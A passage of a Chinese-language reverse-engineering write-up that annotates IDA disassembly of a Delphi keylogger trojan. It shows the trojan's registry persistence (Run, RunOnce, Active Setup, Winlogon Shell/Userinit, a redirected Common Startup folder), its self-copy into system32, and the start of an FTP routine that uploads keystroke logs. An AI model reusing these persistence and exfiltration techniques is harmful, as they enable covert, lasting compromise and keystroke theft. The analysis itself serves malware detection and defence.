; ebx = pointer to the six config flag bytes tested from loc_433814 on
CODE:0043376D
xor eax,
eax
CODE:0043376F
push ebp
CODE:00433770
push offset loc_43388C
CODE:00433775
push dword ptr fs:[
eax]
CODE:00433778
mov fs:[
eax],
esp
; installs an exception frame at fs:[0] with handler loc_43388C
CODE:0043377B
lea edx, [
ebp+var_4]
CODE:0043377E
mov eax, 1
CODE:00433783
call System::ParamStr(
int)
; var_4 = first command-line argument
CODE:00433783
CODE:00433788
mov eax, [
ebp+var_4]
CODE:0043378B
mov edx,
offset s->Reactivateactivex
; "/reactivateActiveX"
CODE:00433790
call System::__linkproc__
LStrCmp(void)
CODE:00433790
CODE:00433795
jnz short loc_4337B9
CODE:00433795
CODE:00433797
mov ecx,
ds:off_4360F0
CODE:0043379D
mov ecx, [
ecx]
CODE:0043379F
lea eax, [
ebp+var_8]
CODE:004337A2
mov edx,
offset s->SoftwareMicrosoftActiveSetupInstalledComponents_0
; "SOFTWARE\\Microsoft\\Active Setup\\Install"...
CODE:004337A7
call System::__linkproc__ LStrCat3(void)
; var_8 = "SOFTWARE\\Microsoft\\Active Setup\\Installed Components..." + [off_4360F0]
CODE:004337A7
CODE:004337AC
mov edx, [
ebp+var_8]
CODE:004337AF
mov eax, HKEY_CURRENT_USER
CODE:004337B4
call _Delete_RegKey
; removes the per-user Active Setup marker so the component is "installed" again
CODE:004337B4
CODE:004337B9
CODE:004337B9 loc_4337B9:
; CODE XREF: _Set_Reg_Info+39j
CODE:004337B9
lea edx, [
ebp+var_C]
CODE:004337BC
mov eax, 1
CODE:004337C1
call System::ParamStr(
int)
CODE:004337C1
CODE:004337C6
mov eax, [
ebp+var_C]
CODE:004337C9
mov edx,
offset s->Reactivaterunonce
; "/reactivateRunOnce"
CODE:004337CE
call System::__linkproc__
LStrCmp(void)
CODE:004337CE
CODE:004337D3
jnz short loc_433814
CODE:004337D3
CODE:004337D5
push offset dword_433918
CODE:004337DA
lea edx, [
ebp+var_14]
CODE:004337DD
xor eax,
eax
CODE:004337DF
call System::ParamStr(
int)
; var_14 = ParamStr(0), own path
CODE:004337DF
CODE:004337E4
push [
ebp+var_14]
CODE:004337E7
push offset dword_433918
CODE:004337EC
lea eax, [
ebp+var_10]
CODE:004337EF
mov edx, 3
CODE:004337F4
call System::__linkproc__ LStrCatN(void)
; var_10 = dword_433918 + <own path> + dword_433918
CODE:004337F4
CODE:004337F9
mov eax, [
ebp+var_10]
CODE:004337FC
push eax
CODE:004337FD
mov ecx,
ds:off_436270
CODE:00433803
mov ecx, [
ecx]
; value name from the decoded config (SCISound per the author's list below)
CODE:00433805
mov edx,
offset s->SoftwareMicrosoftWindowsCurrentversionRunonce_0
; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:0043380A
mov eax, HKEY_LOCAL_MACHINE
CODE:0043380F
call _Create_RegKey
CODE:0043380F
CODE:00433814
CODE:00433814 loc_433814:
; CODE XREF: _Set_Reg_Info+77j
; from here on: one config flag byte per persistence mechanism
CODE:00433814
cmp byte ptr [
ebx], 1
CODE:00433817
jnz short loc_433825
CODE:00433817
CODE:00433819
mov eax,
ds:off_4361AC
; eax = address of the relevant decoded-config entry
CODE:0043381E
mov eax, [
eax]
; load the decoded-config entry; here it is svchost
CODE:00433820
call _Create_Run_RegKey
CODE:00433820
CODE:00433825
CODE:00433825 loc_433825:
; CODE XREF: _Set_Reg_Info+BBj
CODE:00433825
cmp byte ptr [
ebx+1], 1
CODE:00433829
jnz short loc_433837
CODE:00433829
CODE:0043382B
mov eax,
ds:off_436270
CODE:00433830
mov eax, [
eax]
CODE:00433832
call _Create_RunOnce_RegKey
CODE:00433832
CODE:00433837
CODE:00433837 loc_433837:
; CODE XREF: _Set_Reg_Info+CDj
CODE:00433837
cmp byte ptr [
ebx+2], 1
CODE:0043383B
jnz short loc_433849
CODE:0043383B
CODE:0043383D
mov eax,
ds:off_4360F0
CODE:00433842
mov eax, [
eax]
; eax = the "{4fz8rk-15aq-16nc-23or4-2ke0fa051515}" string from the decoded config
CODE:00433844
call _Create_Component_RegKey
CODE:00433844
CODE:00433849
CODE:00433849 loc_433849:
; CODE XREF: _Set_Reg_Info+DFj
CODE:00433849
cmp byte ptr [
ebx+3], 1
CODE:0043384D
jnz short loc_43385B
CODE:0043384D
CODE:0043384F
mov eax,
ds:off_436044
CODE:00433854
mov eax, [
eax]
; here this is the decoded-config string pschost
CODE:00433856
call _Create_Dir_and_CopyFile
CODE:00433856
CODE:0043385B
CODE:0043385B loc_43385B:
; CODE XREF: _Set_Reg_Info+F1j
CODE:0043385B
cmp byte ptr [
ebx+4], 1
CODE:0043385F
jnz short loc_433866
CODE:0043385F
CODE:00433861
call _Create_Winlogon_RegKey
CODE:00433861
CODE:00433866
CODE:00433866 loc_433866:
; CODE XREF: _Set_Reg_Info+103j
CODE:00433866
cmp byte ptr [
ebx+5], 1
CODE:0043386A
jnz short loc_433871
CODE:0043386A
CODE:0043386C
call _Create_Winlogon_Shell_RegKey
CODE:0043386C
CODE:00433871
CODE:00433871 loc_433871:
; CODE XREF: _Set_Reg_Info+10Ej
; exit path: unhook the exception frame, release string locals, restore ebx
CODE:00433871
xor eax,
eax
CODE:00433873
pop edx
CODE:00433874
pop ecx
CODE:00433875
pop ecx
CODE:00433876
mov fs:[
eax],
edx
CODE:00433879
push offset loc_433893
CODE:00433879
CODE:0043387E
CODE:0043387E loc_43387E:
; CODE XREF: _Set_Reg_Info+135j
CODE:0043387E
lea eax, [
ebp+var_14]
CODE:00433881
mov edx, 5
CODE:00433886
call System::__linkproc__ LStrArrayClr(void *,
int)
; frees the 5 string locals var_14..var_4
CODE:00433886
CODE:0043388B
retn
CODE:0043388B
CODE:0043388C
; ---------------------------------------------------------------------------
CODE:0043388C
CODE:0043388C loc_43388C:
; DATA XREF: _Set_Reg_Info+14o
; exception handler registered at function entry
CODE:0043388C
jmp unknown_libname_48
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:0043388C
CODE:00433891
; ---------------------------------------------------------------------------
CODE:00433891
jmp short loc_43387E
CODE:00433891
CODE:00433893
; ---------------------------------------------------------------------------
CODE:00433893
CODE:00433893 loc_433893:
; CODE XREF: _Set_Reg_Info+12Fj
CODE:00433893
; DATA XREF: _Set_Reg_Info+11Do
CODE:00433893
pop ebx
CODE:00433894
mov esp,
ebp
CODE:00433896
pop ebp
CODE:00433897
retn
CODE:00433897
CODE:00433897 _Set_Reg_Info
endp
其中的
CODE:00433856
call _Create_Dir_and_CopyFile
是用来创建文件的。到这个
CALL 里看看:
CODE:00414C34 _Create_Dir_and_CopyFile
proc near
; CODE XREF: _Set_Reg_Info+FAp
; Creates <system dir>\<name> if it does not exist, copies the running
; executable into it under its own file name, and points
; HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
; \User Shell Folders\Common Startup (Windows' all-users Startup folder
; location) at that directory.
; In:  eax = AnsiString directory name (pschost per the decoded config)
; Out: none; side effects are the directory, the file copy and the
;      registry value. Return values of CreateDirectoryA / CopyFileA are
;      not checked.
; Note the asymmetry visible below: the existence test is for
; <dir>\copia.exe, but the file actually written is
; <dir>\ExtractFileName(ParamStr(0)), so the test only skips the copy when
; that differently named file is present. Redirecting Common Startup is
; the persistence effect here; the value is worth monitoring.
CODE:00414C34
CODE:00414C34 var_20 =
dword ptr -20h
CODE:00414C34 var_1C =
dword ptr -1Ch
CODE:00414C34 var_18 =
dword ptr -18h
CODE:00414C34 var_14 =
dword ptr -14h
CODE:00414C34 var_10 =
dword ptr -10h
CODE:00414C34 var_C =
dword ptr -0Ch
CODE:00414C34 var_8 =
dword ptr -8
CODE:00414C34 var_4 =
dword ptr -4
CODE:00414C34
CODE:00414C34
push ebp
CODE:00414C35
mov ebp,
esp
CODE:00414C37
xor ecx,
ecx
CODE:00414C39
push ecx
CODE:00414C3A
push ecx
CODE:00414C3B
push ecx
CODE:00414C3C
push ecx
CODE:00414C3D
push ecx
CODE:00414C3E
push ecx
CODE:00414C3F
push ecx
CODE:00414C40
push ecx
; eight zeroed AnsiString locals (var_4 .. var_20)
CODE:00414C41
mov [
ebp+var_4],
eax
CODE:00414C44
mov eax, [
ebp+var_4]
CODE:00414C47
call System::__linkproc__ LStrAddRef(void *)
; var_4 = the directory-name argument, reference-counted for the lifetime of this call
CODE:00414C47
CODE:00414C4C
xor eax,
eax
CODE:00414C4E
push ebp
CODE:00414C4F
push offset loc_414D35
CODE:00414C54
push dword ptr fs:[
eax]
CODE:00414C57
mov fs:[
eax],
esp
; installs an exception frame at fs:[0] with handler loc_414D35
CODE:00414C5A
lea eax, [
ebp+var_C]
CODE:00414C5D
call _Get_System_Dir
; var_C = system directory (helper not shown)
CODE:00414C5D
CODE:00414C62
push [
ebp+var_C]
CODE:00414C65
push offset asc_414D48
; "\\"
CODE:00414C6A
push [
ebp+var_4]
CODE:00414C6D
lea eax, [
ebp+var_8]
CODE:00414C70
mov edx, 3
CODE:00414C75
call System::__linkproc__ LStrCatN(void)
; var_8 = <system dir> + "\\" + <name>
CODE:00414C75
CODE:00414C7A
mov eax, [
ebp+var_8]
CODE:00414C7D
call Sysutils::DirectoryExists(System::AnsiString)
CODE:00414C7D
CODE:00414C82
test al,
al
CODE:00414C84
jnz short loc_414C96
CODE:00414C84
CODE:00414C86
push 0
; lpSecurityAttributes
CODE:00414C88
mov eax, [
ebp+var_8]
CODE:00414C8B
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00414C8B
CODE:00414C90
push eax ; lpPathName
CODE:00414C91
call CreateDirectoryA
; create the pschost directory under the system directory, e.g. C:\WINDOWS\system32\pschost
CODE:00414C91
CODE:00414C96
CODE:00414C96 loc_414C96:
; CODE XREF: _Create_Dir_and_CopyFile+50j
CODE:00414C96
lea eax, [
ebp+var_10]
CODE:00414C99
mov ecx,
offset s->Copia_exe
; "\\copia.exe"
CODE:00414C9E
mov edx, [
ebp+var_8]
CODE:00414CA1
call System::__linkproc__ LStrCat3(void)
; var_10 = <dir> + "\\copia.exe" -- only used for the existence test
CODE:00414CA1
CODE:00414CA6
mov eax, [
ebp+var_10]
CODE:00414CA9
call Sysutils::FileExists(System::AnsiString)
CODE:00414CA9
CODE:00414CAE
test al,
al
CODE:00414CB0
jnz short loc_414D02
CODE:00414CB0
CODE:00414CB2
push 0
; bFailIfExists
CODE:00414CB4
push [
ebp+var_8]
CODE:00414CB7
push offset asc_414D48
; "\\"
CODE:00414CBC
lea edx, [
ebp+var_1C]
CODE:00414CBF
xor eax,
eax
CODE:00414CC1
call System::ParamStr(
int)
; var_1C = ParamStr(0), own path
CODE:00414CC1
CODE:00414CC6
mov eax, [
ebp+var_1C]
CODE:00414CC9
lea edx, [
ebp+var_18]
CODE:00414CCC
call Sysutils::ExtractFileName(System::AnsiString)
CODE:00414CCC
CODE:00414CD1
push [
ebp+var_18]
CODE:00414CD4
lea eax, [
ebp+var_14]
CODE:00414CD7
mov edx, 3
CODE:00414CDC
call System::__linkproc__ LStrCatN(void)
; var_14 = <dir> + "\\" + <own file name>
CODE:00414CDC
CODE:00414CE1
mov eax, [
ebp+var_14]
CODE:00414CE4
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00414CE4
CODE:00414CE9
push eax ; lpNewFileName
CODE:00414CEA
lea edx, [
ebp+var_20]
CODE:00414CED
xor eax,
eax
CODE:00414CEF
call System::ParamStr(
int)
CODE:00414CEF
CODE:00414CF4
mov eax, [
ebp+var_20]
CODE:00414CF7
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00414CF7
CODE:00414CFC
push eax ; lpExistingFileName
CODE:00414CFD
call CopyFileA
; copy the trojan file into the newly created pschost directory under the system directory
CODE:00414CFD
CODE:00414D02
CODE:00414D02 loc_414D02:
; CODE XREF: _Create_Dir_and_CopyFile+7Cj
CODE:00414D02
mov eax, [
ebp+var_8]
CODE:00414D05
push eax
; the value written is the directory path built above
CODE:00414D06
mov ecx,
offset s->CommonStartup
; "Common Startup"
CODE:00414D0B
mov edx,
offset s->SoftwareMicrosoftWindowsCurrentversionExplorerUserShellFo
; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:00414D10
mov eax, HKEY_LOCAL_MACHINE
CODE:00414D15
call _Create_RegKey
; set the Common Startup value of HKEY_LOCAL_MACHINE\SOFTWARE
CODE:00414D15
; \Microsoft\Windows\CurrentVersion\Explorer
CODE:00414D15
; \User Shell Folders
CODE:00414D15
; to the directory created above
CODE:00414D15
CODE:00414D1A
xor eax,
eax
CODE:00414D1C
pop edx
CODE:00414D1D
pop ecx
CODE:00414D1E
pop ecx
CODE:00414D1F
mov fs:[
eax],
edx
; unhook the exception frame
CODE:00414D22
push offset loc_414D3C
CODE:00414D22
CODE:00414D27
CODE:00414D27 loc_414D27:
; CODE XREF: _Create_Dir_and_CopyFile+106j
CODE:00414D27
lea eax, [
ebp+var_20]
CODE:00414D2A
mov edx, 8
CODE:00414D2F
call System::__linkproc__ LStrArrayClr(void *,
int)
; frees the 8 string locals var_20..var_4
CODE:00414D2F
CODE:00414D34
retn
CODE:00414D34
CODE:00414D35
; ---------------------------------------------------------------------------
CODE:00414D35
CODE:00414D35 loc_414D35:
; DATA XREF: _Create_Dir_and_CopyFile+1Bo
; exception handler registered at function entry
CODE:00414D35
jmp unknown_libname_48
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00414D35
CODE:00414D3A
; ---------------------------------------------------------------------------
CODE:00414D3A
jmp short loc_414D27
CODE:00414D3A
CODE:00414D3C
; ---------------------------------------------------------------------------
CODE:00414D3C
CODE:00414D3C loc_414D3C:
; CODE XREF: _Create_Dir_and_CopyFile+100j
CODE:00414D3C
; DATA XREF: _Create_Dir_and_CopyFile+EEo
CODE:00414D3C
mov esp,
ebp
CODE:00414D3E
pop ebp
CODE:00414D3F
retn
CODE:00414D3F
CODE:00414D3F _Create_Dir_and_CopyFile
endp
经过以上处理,会在注册表中作如下设置:
1、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 下创建 SCISound 项,键值为路径加木马文件名,带参数 /lanzateRunOnce
2、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 下的 Shell 项中添加木马文件路径+文件名
3、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 添加 svchost 项,键值为木马文件路径+文件名
4、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components 下创建项 {4fz8rk-15aq-16nc-23or4-2ke0fa051515},再在
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{4fz8rk-15aq-16nc-23or4-2ke0fa051515} 下创建项 StubPath,键值为木马路径加文件名,带参数 /lanzateActiveX
5、如果在系统目录(如 C:\WINDOWS\system32) 下创建了 pschost 目录,则把
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Startup 的键值改为以上新建的目录
6、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 下的 UserInit 项中添加木马路径+文件名的键值
----------------------------------------------------------------------------------------------------------
四、键盘记录
键盘记录的我就不贴代码了,比较长。无非就是设定时器,扫描键盘,再生成记录文件。
最后还有个连接 FTP 的,会在 FTP 里创建 iklogs 目录,上传你机器上生成的记录,这里略过:
CODE:00432D30 _FTP_Work
proc near
; DATA XREF: CODE:00431264o
CODE:00432D30
CODE:00432D30 var_178 =
dword ptr -178h
CODE:00432D30 var_174 =
dword ptr -174h
CODE:00432D30 var_170 =
dword ptr -170h
CODE:00432D30 var_16C =
dword ptr -16Ch
CODE:00432D30 var_168 =
dword ptr -168h
CODE:00432D30 var_164 =
dword ptr -164h
CODE:00432D30 var_160 =
byte ptr -160h
CODE:00432D30 var_154 =
dword ptr -154h
CODE:00432D30 var_8 =
dword ptr -8
CODE:00432D30 var_4 =
dword ptr -4
CODE:00432D30
CODE:00432D30
push ebp
CODE:00432D31
mov ebp,
esp
CODE:00432D33
add esp, 0FFFFFE88h
CODE:00432D39
push ebx
CODE:00432D3A
push esi
CODE:00432D3B
push edi
CODE:00432D3C
xor edx,
edx
CODE:00432D3E
mov [
ebp+var_178],
edx
CODE:00432D44
mov [
ebp+var_174],
edx
CODE:00432D4A
mov [
ebp+var_170],
edx
CODE:00432D50
mov [
ebp+var_16C],
edx
CODE:00432D56
mov [
ebp+var_168],
edx
CODE:00432D5C
mov [
ebp+var_164],
edx
CODE:00432D62
mov [
ebp+var_4],
edx
CODE:00432D65
mov [
ebp+var_8],
edx
CODE:00432D68
lea eax, [
ebp+var_160]
CODE:00432D6E
mov edx, off_406540
CODE:00432D74
call unknown_libname_68
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00432D74
CODE:00432D79
xor eax,
eax
CODE:00432D7B
push ebp
CODE:00432D7C
push offset loc_433129
CODE:00432D81
push dword ptr fs:[
eax]
CODE:00432D84
mov fs:[
eax],
esp
CODE:00432D87
mov ds:byte_437A3C, 1
CODE:00432D8E
push 0
CODE:00432D90
push 0
CODE:00432D92
push 0
CODE:00432D94
push 1
CODE:00432D96
push offset s->Iexplore
; "iexplore"
CODE:00432D9B
call InternetOpenA
--------------------------------------------------------------------------------
【版权声明】: 本文纯属技术交流, 转载请注明作者并保持文章的完整, 谢谢!